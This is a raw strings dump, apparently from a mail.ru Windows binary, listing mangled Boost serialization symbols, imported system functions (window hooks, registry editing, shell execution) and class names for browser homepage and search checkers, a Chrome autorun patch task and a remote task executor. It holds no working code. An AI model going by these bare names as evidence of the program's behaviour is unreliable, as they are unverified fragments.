??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ@51
?get_const_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ
?get_const_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ
?get_const_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@SAABV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_const_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@SAABV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ
?get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ
?get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@A
?instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@A
?instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@0AAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@A
?instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@A
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@A
?instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@0AAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
GetProcessHeap
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ReportEventA
ADVAPI32.dll
FindExecutableW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
PSAPI.DLL
USERENV.dll
WTSAPI32.dll
CRYPT32.dll
VERSION.dll
CreateIoCompletionPort
GetCPInfo
ShellExecuteExW
CoInternetParseUrl
urlmon.dll
PeekNamedPipe
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
zcÁ
.?AV?$_Ref_count_obj@VAuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VAuditFirefox@mailru@@@std@@
.?AVAuditFirefox@mailru@@
.?AVCheckerFirefox@AuditFirefox@mailru@@
.?AVCheckerHomepageFirefox@AuditFirefox@mailru@@
.?AVCheckerDefaultSearchFirefox@AuditFirefox@mailru@@
.?AVCheckerVbmFirefox@AuditFirefox@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmFirefox@AuditFirefox@mailru@@@std@@
.?AVAuditGoogleChrome@mailru@@
.?AVCheckerCh@AuditGoogleChrome@mailru@@
.?AVCheckerHomepageCh@AuditGoogleChrome@mailru@@
.?AVCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@
.?AVCheckerVbmCh@AuditGoogleChrome@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Func_base@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8b00b026c9439ae5ee123b07f29330c6>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d67d694cf66593a3e1cbe5e0ac457329>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVsettings@firefox@mailru@@
.?AVvisual_bookmarks@firefox@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_852549d506963e7e0155e6efc072a19d>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8f47c682880de3b4c07e24e1559f18fc>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$thread_data@V?$bind_t@XV?$mf0@XVRemoteTasksExecuter@mailru@@@_mfi@boost@@V?$list1@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@@_bi@3@@_bi@boost@@@detail@boost@@
.?AV?$thread_data@V?$bind_t@XV?$mf1@XVRemoteTasksExecuter@mailru@@ABV?$shared_ptr@VTaskInterface@mailru@@@std@@@_mfi@boost@@V?$list2@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@V?$value@V?$shared_ptr@VTaskInterface@mailru@@@std@@@23@@_bi@3@@_bi@boost@@@detail@boost@@
.?AVTaskOneTimeWithChromeAutorunPatch@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_36e85ead181c17858a3fd5b6f23c888c>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d71f87b5d93256d8ef11999b81c97114>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_ff52a01b8c5e4b0628fdb56e2a8b3e6f>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVwindows_file_codecvt@@
.PAUattribute_name_info_tag@v2s_mt_nt5@log@boost@@
.?AVexception@sqlite@mailru@@
.?AV?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@
.?AU?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@
.?AUProcessKey@sysinfo@mailru@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
